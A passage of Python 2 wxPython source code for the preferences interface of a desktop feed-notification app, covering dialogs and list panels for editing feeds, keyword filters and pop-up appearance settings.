font.SetWeight(wx.FONTWEIGHT_BOLD)
label.SetFont(font)
sizer.Add(label, (index, 0), flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
controls = []
for index in indexes[:-2]:
style = wx.TE_READONLY if index == 0 else 0
control = wx.TextCtrl(parent, -1, '', size=(300, -1), style=style)
control.Bind(wx.EVT_TEXT, self.on_text)
sizer.Add(control, (index, 1), (1, 2))
controls.append(control)
url, title, link = controls
self.url, self.title, self.link = controls
url.ChangeValue(self.feed.url)
title.ChangeValue(self.feed.title)
link.ChangeValue(self.feed.link)
url.SetBackgroundColour(parent.GetBackgroundColour())
_interval, _units = util.split_time(self.feed.interval)
interval = wx.SpinCtrl(parent, -1, str(_interval), min=1, max=60, size=(64, -1))
units = wx.Choice(parent, -1)
units.Append('second(s)', 1)
units.Append('minute(s)', 60)
units.Append('hour(s)', 60*60)
units.Append('day(s)', 60*60*24)
units.Select(_units)
self.interval, self.units = interval, units
sizer.Add(interval, (5, 1))
sizer.Add(units, (5, 2))
self.color = color = wx.Button(parent, -1)
color.Bind(wx.EVT_BUTTON, self.on_color)
color._color = self.feed.color
_color = self.feed.color or settings.POPUP_BORDER_COLOR
color.SetBackgroundColour(wx.Color(*_color))
sizer.Add(color, (7, 1))
self.default = default = wx.Button(parent, -1, 'Use Default')
default.Bind(wx.EVT_BUTTON, self.on_default)
sizer.Add(default, (7, 2))
label = wx.StaticText(parent, -1, 'The feed title will be shown in the pop-up window for items from this feed.')
label.Wrap(300)
sizer.Add(label, (2, 1), (1, 2), flag=wx.ALIGN_CENTER_VERTICAL)
label = wx.StaticText(parent, -1, 'The feed link will launch in your browser if you click on the feed title in a pop-up window.')
label.Wrap(300)
sizer.Add(label, (4, 1), (1, 2), flag=wx.ALIGN_CENTER_VERTICAL)
label = wx.StaticText(parent, -1, 'The polling interval specifies how often the application will check the feed for new items. When adding a new feed, the application automatically fills this in by examining the items in the feed.')
label.Wrap(300)
sizer.Add(label, (6, 1), (1, 2), flag=wx.ALIGN_CENTER_VERTICAL)
label = wx.StaticText(parent, -1, 'The color specifies the border color of pop-up windows for this feed, if you want to override the default.')
label.Wrap(300)
sizer.Add(label, (8, 1), (1, 2), flag=wx.ALIGN_CENTER_VERTICAL)
return sizer
def create_add_buttons(self, parent):
sizer = wx.BoxSizer(wx.HORIZONTAL)
back = wx.Button(parent, wx.ID_BACKWARD, '< Back')
next = wx.Button(parent, wx.ID_FORWARD, 'Finish')
cancel = wx.Button(parent, wx.ID_CANCEL, 'Cancel')
next.SetDefault()
next.Bind(wx.EVT_BUTTON, self.on_next)
back.Bind(wx.EVT_BUTTON, self.on_back)
self.next = next
sizer.AddStretchSpacer(1)
sizer.Add(back)
sizer.AddSpacer(4)
sizer.Add(next)
sizer.AddSpacer(16)
sizer.Add(cancel)
return sizer
def create_edit_buttons(self, parent):
sizer = wx.BoxSizer(wx.HORIZONTAL)
next = wx.Button(parent, wx.ID_FORWARD, 'OK')
cancel = wx.Button(parent, wx.ID_CANCEL, 'Cancel')
next.SetDefault()
next.Bind(wx.EVT_BUTTON, self.on_next)
self.next = next
sizer.AddStretchSpacer(1)
sizer.Add(next)
sizer.AddSpacer(8)
sizer.Add(cancel)
return sizer
def validate(self):
controls = [self.url, self.title, self.link]
if all(control.GetValue() for control in controls):
self.next.Enable()
else:
self.next.Disable()
def on_color(self, event):
data = wx.ColourData()
data.SetColour(self.color.GetBackgroundColour())
dialog = wx.ColourDialog(self, data)
if dialog.ShowModal() == wx.ID_OK:
color = dialog.GetColourData().GetColour()
self.color.SetBackgroundColour(color)
self.color._color = (color.Red(), color.Green(), color.Blue())
def on_default(self, event):
self.color.SetBackgroundColour(wx.Color(*settings.POPUP_BORDER_COLOR))
self.color._color = None
def on_text(self, event):
self.validate()
def on_back(self, event):
self.EndModal(wx.ID_BACKWARD)
def on_next(self, event):
url = self.url.GetValue()
title = self.title.GetValue()
link = self.link.GetValue()
interval = int(self.interval.GetValue())
multiplier = self.units.GetClientData(self.units.GetSelection())
interval = interval * multiplier
if interval < 60:
dialog = wx.MessageDialog(self, 'Are you sure you want to check this feed every %d second(s)?\n\nYou might make the website administrator unhappy!' % interval, 'Confirm Polling Interval', wx.YES_NO|wx.NO_DEFAULT|wx.ICON_QUESTION)
result = dialog.ShowModal()
dialog.Destroy()
if result == wx.ID_NO:
return
self.feed.title = title
self.feed.link = link
self.feed.interval = interval
self.feed.color = self.color._color
self.EndModal(wx.ID_OK)
class EditFilterDialog(wx.Dialog):
def __init__(self, parent, model, filter=None):
title = 'Edit Filter' if filter else 'Add Filter'
style = wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER
super(EditFilterDialog, self).__init__(parent, -1, title, style=style)
util.set_icon(self)
self.model = model
self.filter = filter or feeds.Filter('')
panel = self.create_panel(self)
buttons = self.create_buttons(self)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(panel, 1, wx.EXPAND|wx.ALL, 8)
sizer.Add(buttons, 0, wx.EXPAND|wx.ALL&~wx.TOP, 8)
self.SetSizerAndFit(sizer)
self.validate()
def create_panel(self, parent):
panel = wx.Panel(parent, -1)
rules = self.create_rules(panel)
options = self.create_options(panel)
sizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.Add(rules, 1, wx.EXPAND)
sizer.AddSpacer(8)
sizer.Add(options, 0, wx.EXPAND)
panel.SetSizer(sizer)
return panel
def create_buttons(self, parent):
ok = wx.Button(parent, wx.ID_OK, 'OK')
cancel = wx.Button(parent, wx.ID_CANCEL, 'Cancel')
sizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.AddStretchSpacer(1)
sizer.Add(ok)
sizer.AddSpacer(8)
sizer.Add(cancel)
ok.SetDefault()
ok.Bind(wx.EVT_BUTTON, self.on_ok)
self.ok = ok
return sizer
def create_rules(self, parent):
box = wx.StaticBox(parent, -1, 'Filter Rules')
box = wx.StaticBoxSizer(box, wx.VERTICAL)
code = wx.TextCtrl(parent, -1, self.filter.code, style=wx.TE_MULTILINE, size=(250, -1))
text = '''
Examples:
-microsoft and -apple (exclude microsoft and apple)
google or yahoo (require google or yahoo)
-author:BoringGuy (search author field only)
'''
text = '\n'.join(line.strip() for line in text.strip().split('\n'))
help = wx.StaticText(parent, -1, text)
box.Add(code, 1, wx.EXPAND|wx.ALL, 8)
box.Add(help, 0, wx.EXPAND|wx.ALL&~wx.TOP, 8)
code.Bind(wx.EVT_TEXT, self.on_event)
self.code = code
return box
def create_options(self, parent):
sizer = wx.BoxSizer(wx.VERTICAL)
box = wx.StaticBox(parent, -1, 'Options')
box = wx.StaticBoxSizer(box, wx.VERTICAL)
match_case = wx.CheckBox(parent, -1, 'Match Case')
match_whole_words = wx.CheckBox(parent, -1, 'Match Whole Words')
match_case.SetValue(not self.filter.ignore_case)
match_whole_words.SetValue(self.filter.whole_word)
box.Add(match_case, 0, wx.ALL, 8)
box.Add(match_whole_words, 0, wx.ALL&~wx.TOP, 8)
sizer.Add(box, 0, wx.EXPAND)
sizer.AddSpacer(8)
box = wx.StaticBox(parent, -1, 'Apply Filter To')
box = wx.StaticBoxSizer(box, wx.VERTICAL)
all_feeds = wx.RadioButton(parent, -1, 'All Feeds', style=wx.RB_GROUP)
selected_feeds = wx.RadioButton(parent, -1, 'Selected Feeds')
if self.filter.feeds:
selected_feeds.SetValue(True)
feeds = wx.CheckListBox(parent, -1, size=(150, 150), style=wx.LB_HSCROLL|wx.LB_EXTENDED)
def cmp_title(a, b):
return cmp(a.title.lower(), b.title.lower())
self.lookup = {}
items = self.model.controller.manager.feeds
for index, feed in enumerate(sorted(items, cmp=cmp_title)):
feeds.Append(feed.title)
self.lookup[index] = feed
feeds.Check(index, feed in self.filter.feeds)
box.Add(all_feeds, 0, wx.ALL, 8)
box.Add(selected_feeds, 0, wx.ALL&~wx.TOP, 8)
box.Add(feeds, 1, wx.ALL&~wx.TOP, 8)
sizer.Add(box, 1, wx.EXPAND)
match_case.Bind(wx.EVT_CHECKBOX, self.on_event)
match_whole_words.Bind(wx.EVT_CHECKBOX, self.on_event)
all_feeds.Bind(wx.EVT_RADIOBUTTON, self.on_event)
selected_feeds.Bind(wx.EVT_RADIOBUTTON, self.on_event)
feeds.Bind(wx.EVT_CHECKLISTBOX, self.on_event)
self.match_case = match_case
self.match_whole_words = match_whole_words
self.all_feeds = all_feeds
self.selected_feeds = selected_feeds
self.feeds = feeds
return sizer
def get_selected_feeds(self):
result = set()
if self.selected_feeds.GetValue():
for index in range(self.feeds.GetCount()):
if self.feeds.IsChecked(index):
result.add(self.lookup[index])
return result
def validate(self):
feeds = self.get_selected_feeds()
valid = True
valid = valid and self.code.GetValue()
valid = valid and (self.all_feeds.GetValue() or feeds)
try:
filters.parse(self.code.GetValue())
except Exception:
valid = False
self.ok.Enable(bool(valid))
self.feeds.Enable(self.selected_feeds.GetValue())
def on_event(self, event):
self.validate()
def on_ok(self, event):
filter = self.filter
filter.code = self.code.GetValue()
filter.ignore_case = not self.match_case.GetValue()
filter.whole_word = self.match_whole_words.GetValue()
filter.feeds = self.get_selected_feeds()
event.Skip()
class Model(object):
def __init__(self, controller):
self.controller = controller
self.reset()
def reset(self):
self._feed_sort = -1
self._filter_sort = -1
feeds = self.controller.manager.feeds
feeds = [feed.make_copy() for feed in feeds]
self.feeds = feeds
filters = self.controller.manager.filters
filters = [filter.make_copy() for filter in filters]
self.filters = filters
self.settings = {}
def __getattr__(self, key):
if key != key.upper():
return super(Model, self).__getattr__(key)
if key in self.settings:
return self.settings[key]
return getattr(settings, key)
def __setattr__(self, key, value):
if key != key.upper():
return super(Model, self).__setattr__(key, value)
self.settings[key] = value
def apply(self):
self.apply_filters()
self.apply_feeds()
self.apply_settings()
self.controller.save()
def apply_settings(self):
for key, value in self.settings.items():
setattr(settings, key, value)
def apply_feeds(self):
before = {}
after = {}
controller = self.controller
for feed in controller.manager.feeds:
before[feed.uuid] = feed
for feed in self.feeds:
after[feed.uuid] = feed
before_set = set(before.keys())
after_set = set(after.keys())
added = after_set - before_set
deleted = before_set - after_set
same = after_set & before_set
for uuid in added:
feed = after[uuid]
controller.manager.add_feed(feed)
for uuid in deleted:
feed = before[uuid]
controller.manager.remove_feed(feed)
for uuid in same:
a = before[uuid]
b = after[uuid]
a.copy_from(b)
def apply_filters(self):
before = {}
after = {}
controller = self.controller
for filter in controller.manager.filters:
before[filter.uuid] = filter
for filter in self.filters:
after[filter.uuid] = filter
before_set = set(before.keys())
after_set = set(after.keys())
added = after_set - before_set
deleted = before_set - after_set
same = after_set & before_set
for uuid in added:
filter = after[uuid]
controller.manager.add_filter(filter)
for uuid in deleted:
filter = before[uuid]
controller.manager.remove_filter(filter)
for uuid in same:
a = before[uuid]
b = after[uuid]
a.copy_from(b)
def sort_feeds(self, column):
def cmp_enabled(a, b):
return cmp(a.enabled, b.enabled)
def cmp_clicks(a, b):
return cmp(b.clicks, a.clicks)
def cmp_item_count(a, b):
return cmp(b.item_count, a.item_count)
def cmp_interval(a, b):
return cmp(a.interval, b.interval)
def cmp_title(a, b):
return cmp(a.title.lower(), b.title.lower())
def cmp_url(a, b):
return cmp(a.url.lower(), b.url.lower())
funcs = {
INDEX_ENABLED: cmp_enabled,
INDEX_URL: cmp_url,
INDEX_TITLE: cmp_title,
INDEX_INTERVAL: cmp_interval,
INDEX_CLICKS: cmp_clicks,
INDEX_ITEM_COUNT: cmp_item_count,
}
self.feeds.sort(cmp=funcs[column])
if column == self._feed_sort:
self.feeds.reverse()
self._feed_sort = -1
else:
self._feed_sort = column
def sort_filters(self, column):
def cmp_enabled(a, b):
return cmp(a.enabled, b.enabled)
def cmp_rules(a, b):
return cmp(a.code, b.code)
def cmp_feeds(a, b):
return cmp(len(a.feeds), len(b.feeds))
def cmp_in(a, b):
return cmp(b.inputs, a.inputs)
def cmp_out(a, b):
return cmp(b.outputs, a.outputs)
funcs = {
INDEX_ENABLED: cmp_enabled,
INDEX_RULES: cmp_rules,
INDEX_FEEDS: cmp_feeds,
INDEX_IN: cmp_in,
INDEX_OUT: cmp_out,
}
self.filters.sort(cmp=funcs[column])
if column == self._filter_sort:
self.filters.reverse()
self._filter_sort = -1
else:
self._filter_sort = column
class SettingsDialog(wx.Dialog):
def __init__(self, parent, controller):
title = '%s Preferences' % settings.APP_NAME
style = wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER
super(SettingsDialog, self).__init__(parent, -1, title, style=style)
util.set_icon(self)
#self.SetIcon(wx.IconFromBitmap(wx.Bitmap('icons/feed.png')))
self.model = Model(controller)
panel = self.create_panel(self)
self.Fit()
self.SetMinSize(self.GetSize())
def create_panel(self, parent):
panel = wx.Panel(parent, -1)
notebook = self.create_notebook(panel)
line = wx.StaticLine(panel, -1)
buttons = self.create_buttons(panel)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(notebook, 1, wx.EXPAND|wx.ALL, 0)
sizer.Add(line, 0, wx.EXPAND)
sizer.Add(buttons, 0, wx.EXPAND|wx.ALL, 8)
panel.SetSizerAndFit(sizer)
return panel
def create_notebook(self, parent):
images = wx.ImageList(48, 32)
images.Add(util.scale_bitmap(wx.Bitmap('icons/feed32.png'), -1, -1, self.GetBackgroundColour()))
images.Add(util.scale_bitmap(wx.Bitmap('icons/comment32.png'), -1, -1, self.GetBackgroundColour()))
images.Add(util.scale_bitmap(wx.Bitmap('icons/cog32.png'), -1, -1, self.GetBackgroundColour()))
images.Add(util.scale_bitmap(wx.Bitmap('icons/filter32.png'), -1, -1, self.GetBackgroundColour()))
images.Add(util.scale_bitmap(wx.Bitmap('icons/info32.png'), -1, -1, self.GetBackgroundColour()))
notebook = wx.Toolbook(parent, -1)
notebook.SetInternalBorder(0)
notebook.AssignImageList(images)
feeds = FeedsPanel(notebook, self)
popups = PopupsPanel(notebook, self)
options = OptionsPanel(notebook, self)
filters = FiltersPanel(notebook, self)
about = AboutPanel(notebook)
notebook.AddPage(feeds, 'Feeds', imageId=0)
notebook.AddPage(popups, 'Pop-ups', imageId=1)
notebook.AddPage(options, 'Options', imageId=2)
notebook.AddPage(filters, 'Filters', imageId=3)
notebook.AddPage(about, 'About', imageId=4)
self.popups = popups
self.options = options
notebook.Fit()
return notebook
def create_buttons(self, parent):
sizer = wx.BoxSizer(wx.HORIZONTAL)
ok = wx.Button(parent, wx.ID_OK, 'OK')
cancel = wx.Button(parent, wx.ID_CANCEL, 'Cancel')
apply = wx.Button(parent, wx.ID_APPLY, 'Apply')
ok.Bind(wx.EVT_BUTTON, self.on_ok)
apply.Bind(wx.EVT_BUTTON, self.on_apply)
ok.SetDefault()
apply.Disable()
self.apply_button = apply
sizer.AddStretchSpacer(1)
sizer.Add(ok)
sizer.AddSpacer(8)
sizer.Add(cancel)
sizer.AddSpacer(8)
sizer.Add(apply)
return sizer
def apply(self):
self.popups.update_model()
self.options.update_model()
self.model.apply()
self.model.controller.poll()
def on_change(self):
self.apply_button.Enable()
def on_ok(self, event):
self.apply()
event.Skip()
def on_apply(self, event):
self.apply()
self.apply_button.Disable()
class FeedsList(wx.ListCtrl):
def __init__(self, parent, dialog):
style = wx.LC_REPORT|wx.LC_VIRTUAL#|wx.LC_HRULES|wx.LC_VRULES
super(FeedsList, self).__init__(parent, -1, style=style)
self.dialog = dialog
self.model = dialog.model
images = wx.ImageList(16, 16, True)
images.AddWithColourMask(wx.Bitmap('icons/unchecked.png'), wx.WHITE)
images.AddWithColourMask(wx.Bitmap('icons/checked.png'), wx.WHITE)
self.AssignImageList(images, wx.IMAGE_LIST_SMALL)
self.InsertColumn(INDEX_ENABLED, 'On')
self.InsertColumn(INDEX_URL, 'Feed URL')
self.InsertColumn(INDEX_TITLE, 'Feed Title')
self.InsertColumn(INDEX_INTERVAL, 'Interval')
self.InsertColumn(INDEX_ITEM_COUNT, 'Items')
self.InsertColumn(INDEX_CLICKS, 'Clicks')
self.Bind(wx.EVT_LEFT_DOWN, self.on_left_down)
self.Bind(wx.EVT_LIST_COL_CLICK, self.on_col_click)
self.update()
self.SetColumnWidth(INDEX_ENABLED, 32)
self.SetColumnWidth(INDEX_URL, 165)
self.SetColumnWidth(INDEX_TITLE, 165)
self.SetColumnWidth(INDEX_INTERVAL, 75)
self.SetColumnWidth(INDEX_ITEM_COUNT, -2)
self.SetColumnWidth(INDEX_CLICKS, -2)
def update(self):
self.SetItemCount(len(self.model.feeds))
self.Refresh()
def on_col_click(self, event):
column = event.GetColumn()
self.model.sort_feeds(column)
self.update()
def on_left_down(self, event):
index, flags = self.HitTest(event.GetPosition())
if index >= 0 and (flags & wx.LIST_HITTEST_ONITEMICON):
self.toggle(index)
event.Skip()
def toggle(self, index):
feed = self.model.feeds[index]
feed.enabled = not feed.enabled
self.RefreshItem(index)
self.dialog.on_change()
def OnGetItemImage(self, index):
feed = self.model.feeds[index]
return 1 if feed.enabled else 0
def OnGetItemText(self, index, column):
feed = self.model.feeds[index]
if column == INDEX_URL:
return feed.url
if column == INDEX_TITLE:
return feed.title
if column == INDEX_INTERVAL:
return util.split_time_str(feed.interval)
if column == INDEX_CLICKS:
return str(feed.clicks) if feed.clicks else ''
if column == INDEX_ITEM_COUNT:
return str(feed.item_count) if feed.item_count else ''
return ''
class FiltersList(wx.ListCtrl):
def __init__(self, parent, dialog):
style = wx.LC_REPORT|wx.LC_VIRTUAL#|wx.LC_HRULES|wx.LC_VRULES
super(FiltersList, self).__init__(parent, -1, style=style)
self.dialog = dialog
self.model = dialog.model
images = wx.ImageList(16, 16, True)
images.AddWithColourMask(wx.Bitmap('icons/unchecked.png'), wx.WHITE)
images.AddWithColourMask(wx.Bitmap('icons/checked.png'), wx.WHITE)
self.AssignImageList(images, wx.IMAGE_LIST_SMALL)
self.InsertColumn(INDEX_ENABLED, 'On')
self.InsertColumn(INDEX_RULES, 'Filter Rules')
self.InsertColumn(INDEX_FEEDS, 'Feeds')
self.InsertColumn(INDEX_IN, 'In')
self.InsertColumn(INDEX_OUT, 'Out')
self.Bind(wx.EVT_LEFT_DOWN, self.on_left_down)
self.Bind(wx.EVT_LIST_COL_CLICK, self.on_col_click)
self.update()
self.SetColumnWidth(INDEX_ENABLED, 32)
self.SetColumnWidth(INDEX_RULES, 200)
self.SetColumnWidth(INDEX_FEEDS, 64)
self.SetColumnWidth(INDEX_IN, 64)
self.SetColumnWidth(INDEX_OUT, 64)
def update(self):
self.SetItemCount(len(self.model.filters))
self.Refresh()
def on_col_click(self, event):
column = event.GetColumn()
self.model.sort_filters(column)
self.update()
def on_left_down(self, event):
index, flags = self.HitTest(event.GetPosition())
if index >= 0 and (flags & wx.LIST_HITTEST_ONITEMICON):
self.toggle(index)
event.Skip()
def toggle(self, index):
filter = self.model.filters[index]
filter.enabled = not filter.enabled
self.RefreshItem(index)
self.dialog.on_change()
def OnGetItemImage(self, index):
filter = self.model.filters[index]
return 1 if filter.enabled else 0
def OnGetItemText(self, index, column):
filter = self.model.filters[index]
if column == INDEX_RULES:
return filter.code.replace('\n', ' ')
if column == INDEX_FEEDS:
return str(len(filter.feeds)) if filter.feeds else 'All'
if column == INDEX_IN:
return str(filter.inputs)
if column == INDEX_OUT:
return str(filter.outputs)
return ''
class FeedsPanel(wx.Panel):
def __init__(self, parent, dialog):
super(FeedsPanel, self).__init__(parent, -1)
self.dialog = dialog
self.model = dialog.model
panel = self.create_panel(self)
sizer = wx.BoxSizer(wx.VERTICAL)
line = wx.StaticLine(self, -1)
sizer.Add(line, 0, wx.EXPAND)
sizer.Add(panel, 1, wx.EXPAND|wx.ALL, 8)
self.SetSizerAndFit(sizer)
def create_panel(self, parent):
panel = wx.Panel(parent, -1)
list = FeedsList(panel, self.dialog)
list.Bind(wx.EVT_LIST_ITEM_SELECTED, self.on_selection)
list.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.on_selection)
list.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.on_edit)
list.Bind(wx.EVT_LEFT_DOWN, self.on_left_down)
self.list = list
buttons = self.create_buttons(panel)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(list, 1, wx.EXPAND)
sizer.AddSpacer(8)
sizer.Add(buttons, 0, wx.EXPAND)
panel.SetSizerAndFit(sizer)
return panel
def create_buttons(self, parent):
new = wx.Button(parent, -1, 'Add...')
#import_feeds = wx.Button(parent, -1, 'Import...')
edit = wx.Button(parent, -1, 'Edit...')
delete = wx.Button(parent, -1, 'Delete')
new.Bind(wx.EVT_BUTTON, self.on_new)
edit.Bind(wx.EVT_BUTTON, self.on_edit)
delete.Bind(wx.EVT_BUTTON, self.on_delete)
edit.Disable()
delete.Disable()
self.edit = edit
self.delete = delete
sizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.Add(new)
sizer.AddSpacer(8)
#sizer.Add(import_feeds)
#sizer.AddSpacer(8)
sizer.Add(edit)
sizer.AddSpacer(8)
sizer.Add(delete)
sizer.AddStretchSpacer(1)
return sizer
def update(self):
self.list.update()
self.update_buttons()
self.dialog.on_change()
def on_selection(self, event):
event.Skip()
self.update_buttons()
def update_buttons(self):
count = self.list.GetSelectedItemCount()
self.edit.Enable(count == 1)
self.delete.Enable(count > 0)
def on_left_down(self, event):
index, flags = self.list.HitTest(event.GetPosition())
if flags & wx.LIST_HITTEST_NOWHERE:
self.edit.Disable()
self.delete.Disable()
event.Skip()
def on_edit(self, event):
count = self.list.GetSelectedItemCount()
if count != 1:
return
index = self.list.GetNextItem(-1, wx.LIST_NEXT_ALL, wx.LIST_STATE_SELECTED)
feed = self.model.feeds[index]
window = EditFeedDialog(self, feed)
window.CenterOnScreen()
result = window.ShowModal()
window.Destroy()
if result == wx.ID_OK:
self.update()
def on_new(self, event):
feed = AddFeedDialog.show_wizard(self)
if feed:
self.model.feeds.append(feed)
self.update()
def on_delete(self, event):
dialog = wx.MessageDialog(self.dialog, 'Are you sure you want to delete the selected feed(s)?', 'Confirm Delete', wx.YES_NO|wx.NO_DEFAULT|wx.ICON_QUESTION)
result = dialog.ShowModal()
dialog.Destroy()
if result != wx.ID_YES:
return
feeds = []
index = -1
while True:
index = self.list.GetNextItem(index, wx.LIST_NEXT_ALL, wx.LIST_STATE_SELECTED)
if index < 0:
break
feed = self.model.feeds[index]
feeds.append(feed)
if feeds:
for feed in feeds:
self.model.feeds.remove(feed)
self.update()
class FiltersPanel(wx.Panel):
def __init__(self, parent, dialog):
super(FiltersPanel, self).__init__(parent, -1)
self.dialog = dialog
self.model = dialog.model
panel = self.create_panel(self)
sizer = wx.BoxSizer(wx.VERTICAL)
line = wx.StaticLine(self, -1)
sizer.Add(line, 0, wx.EXPAND)
sizer.Add(panel, 1, wx.EXPAND|wx.ALL, 8)
self.SetSizerAndFit(sizer)
def create_panel(self, parent):
panel = wx.Panel(parent, -1)
list = FiltersList(panel, self.dialog)
list.Bind(wx.EVT_LIST_ITEM_SELECTED, self.on_selection)
list.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.on_selection)
list.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.on_edit)
list.Bind(wx.EVT_LEFT_DOWN, self.on_left_down)
self.list = list
buttons = self.create_buttons(panel)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(list, 1, wx.EXPAND)
sizer.AddSpacer(8)
sizer.Add(buttons, 0, wx.EXPAND)
panel.SetSizerAndFit(sizer)
return panel
def create_buttons(self, parent):
new = wx.Button(parent, -1, 'Add...')
edit = wx.Button(parent, -1, 'Edit...')
delete = wx.Button(parent, -1, 'Delete')
new.Bind(wx.EVT_BUTTON, self.on_new)
edit.Bind(wx.EVT_BUTTON, self.on_edit)
delete.Bind(wx.EVT_BUTTON, self.on_delete)
edit.Disable()
delete.Disable()
self.edit = edit
self.delete = delete
sizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.Add(new)
sizer.AddSpacer(8)
sizer.Add(edit)
sizer.AddSpacer(8)
sizer.Add(delete)
sizer.AddStretchSpacer(1)
return sizer
def update(self):
self.list.update()
self.update_buttons()
self.dialog.on_change()
def on_selection(self, event):
event.Skip()
self.update_buttons()
def update_buttons(self):
count = self.list.GetSelectedItemCount()
self.edit.Enable(count == 1)
self.delete.Enable(count > 0)
def on_left_down(self, event):
index, flags = self.list.HitTest(event.GetPosition())
if flags & wx.LIST_HITTEST_NOWHERE:
self.edit.Disable()
self.delete.Disable()
event.Skip()
def on_edit(self, event):
count = self.list.GetSelectedItemCount()
if count != 1:
return
index = self.list.GetNextItem(-1, wx.LIST_NEXT_ALL, wx.LIST_STATE_SELECTED)
filter = self.model.filters[index]
window = EditFilterDialog(self, self.model, filter)
window.Center()
result = window.ShowModal()
window.Destroy()
if result == wx.ID_OK:
self.update()
def on_new(self, event):
window = EditFilterDialog(self, self.model)
window.Center()
result = window.ShowModal()
filter = window.filter
window.Destroy()
if result == wx.ID_OK:
self.model.filters.append(filter)
self.update()
def on_delete(self, event):
dialog = wx.MessageDialog(self.dialog, 'Are you sure you want to delete the selected filter(s)?', 'Confirm Delete', wx.YES_NO|wx.NO_DEFAULT|wx.ICON_QUESTION)
result = dialog.ShowModal()
dialog.Destroy()
if result != wx.ID_YES:
return
filters = []
index = -1
while True:
index = self.list.GetNextItem(index, wx.LIST_NEXT_ALL, wx.LIST_STATE_SELECTED)
if index < 0:
break
filter = self.model.filters[index]
filters.append(filter)
if filters:
for filter in filters:
self.model.filters.remove(filter)
self.update()
class PopupsPanel(wx.Panel):
def __init__(self, parent, dialog):
super(PopupsPanel, self).__init__(parent, -1)
self.dialog = dialog
self.model = dialog.model
panel = self.create_panel(self)
sizer = wx.BoxSizer(wx.VERTICAL)
line = wx.StaticLine(self, -1)
sizer.Add(line, 0, wx.EXPAND)
sizer.Add(panel, 1, wx.EXPAND|wx.ALL, 8)
self.update_controls()
self.SetSizerAndFit(sizer)
def create_panel(self, parent):
panel = wx.Panel(parent, -1)
sizer = wx.BoxSizer(wx.VERTICAL)
behavior = self.create_behavior(panel)
appearance = self.create_appearance(panel)
content = self.create_content(panel)
sizer.Add(behavior, 0, wx.EXPAND)
sizer.AddSpacer(8)
sizer.Add(appearance, 0, wx.EXPAND)
sizer.AddSpacer(8)
sizer.Add(content, 0, wx.EXPAND)
panel.SetSizerAndFit(sizer)
return panel
def create_appearance(self, parent):
box = wx.StaticBox(parent, -1, 'Appearance')
sizer = wx.StaticBoxSizer(box, wx.VERTICAL)
grid = wx.GridBagSizer(8, 8)
labels = ['Position', 'Width', 'Monitor', 'Transparency', 'Border', 'Border Size']
positions = [(0, 0), (0, 3), (1, 0), (1, 3), (2, 0), (2, 3)]
for label, position in zip(labels, positions):
text = wx.StaticText(parent, -1, label)
grid.Add(text, position, flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
position = wx.Choice(parent, -1)
position.Append('Upper Left', (-1, -1))
position.Append('Upper Right', (1, -1))
position.Append('Lower Left', (-1, 1))
position.Append('Lower Right', (1, 1))
position.Append('Center', (0, 0))
width = wx.SpinCtrl(parent, -1, '1', min=1, max=9999, size=(64, -1))
transparency = wx.SpinCtrl(parent, -1, '0', min=0, max=255, size=(64, -1))
display = wx.Choice(parent, -1)
for index in range(wx.Display_GetCount()):
display.Append('Monitor #%d' % (index + 1), index)
border_color = wx.Button(parent, -1)
border_size = wx.SpinCtrl(parent, -1, '1', min=0, max=9, size=(64, -1))
grid.Add(position, (0, 1), flag=wx.EXPAND)
grid.Add(display, (1, 1), flag=wx.EXPAND)
grid.Add(width, (0, 4))
grid.Add(transparency, (1, 4))
grid.Add(border_color, (2, 1), flag=wx.EXPAND)
grid.Add(border_size, (2, 4))
text = wx.StaticText(parent, -1, 'pixels')
grid.Add(text, (0, 5), flag=wx.ALIGN_CENTER_VERTICAL)
text = wx.StaticText(parent, -1, '[0-255], 255=opaque')
grid.Add(text, (1, 5), flag=wx.ALIGN_CENTER_VERTICAL)
text = wx.StaticText(parent, -1, 'pixels')
grid.Add(text, (2, 5), flag=wx.ALIGN_CENTER_VERTICAL)
sizer.Add(grid, 1, wx.EXPAND|wx.ALL, 8)
position.Bind(wx.EVT_CHOICE, self.on_change)
display.Bind(wx.EVT_CHOICE, self.on_change)
width.Bind(wx.EVT_SPINCTRL, self.on_change)
transparency.Bind(wx.EVT_SPINCTRL, self.on_change)
border_size.Bind(wx.EVT_SPINCTRL, self.on_change)
border_color.Bind(wx.EVT_BUTTON, self.on_border_color)
self.position = position
self.display = display
self.width = width
self.transparency = transparency
self.border_color = border_color
self.border_size = border_size
return sizer
def create_behavior(self, parent):
box = wx.StaticBox(parent, -1, 'Behavior')
sizer = wx.StaticBoxSizer(box, wx.VERTICAL)
grid = wx.GridBagSizer(8, 8)
text = wx.StaticText(parent, -1, 'Duration')
grid.Add(text, (0, 0), flag=wx.ALIGN_CENTER_VERTICAL)
text = wx.StaticText(parent, -1, 'seconds')
grid.Add(text, (0, 2), flag=wx.ALIGN_CENTER_VERTICAL)
duration = wx.SpinCtrl(parent, -1, '1', min=1, max=60, size=(64, -1))
auto = wx.CheckBox(parent, -1, 'Infinite duration')
sound = wx.CheckBox(parent, -1, 'Sound notification')
hover = wx.CheckBox(parent, -1, 'Wait if hovering')
top = wx.CheckBox(parent, -1, 'Stay on top')
grid.Add(duration, (0, 1))
grid.Add(auto, (0, 4), flag=wx.ALIGN_CENTER_VERTICAL)
grid.Add(sound, (1, 4), flag=wx.ALIGN_CENTER_VERTICAL)
grid.Add(hover, (0, 6), flag=wx.ALIGN_CENTER_VERTICAL)
grid.Add(top, (1, 6), flag=wx.ALIGN_CENTER_VERTICAL)
sizer.Add(grid, 1, wx.EXPAND|wx.ALL, 8)
duration.Bind(wx.EVT_SPINCTRL, self.on_change)
auto.Bind(wx.EVT_CHECKBOX, self.on_change)
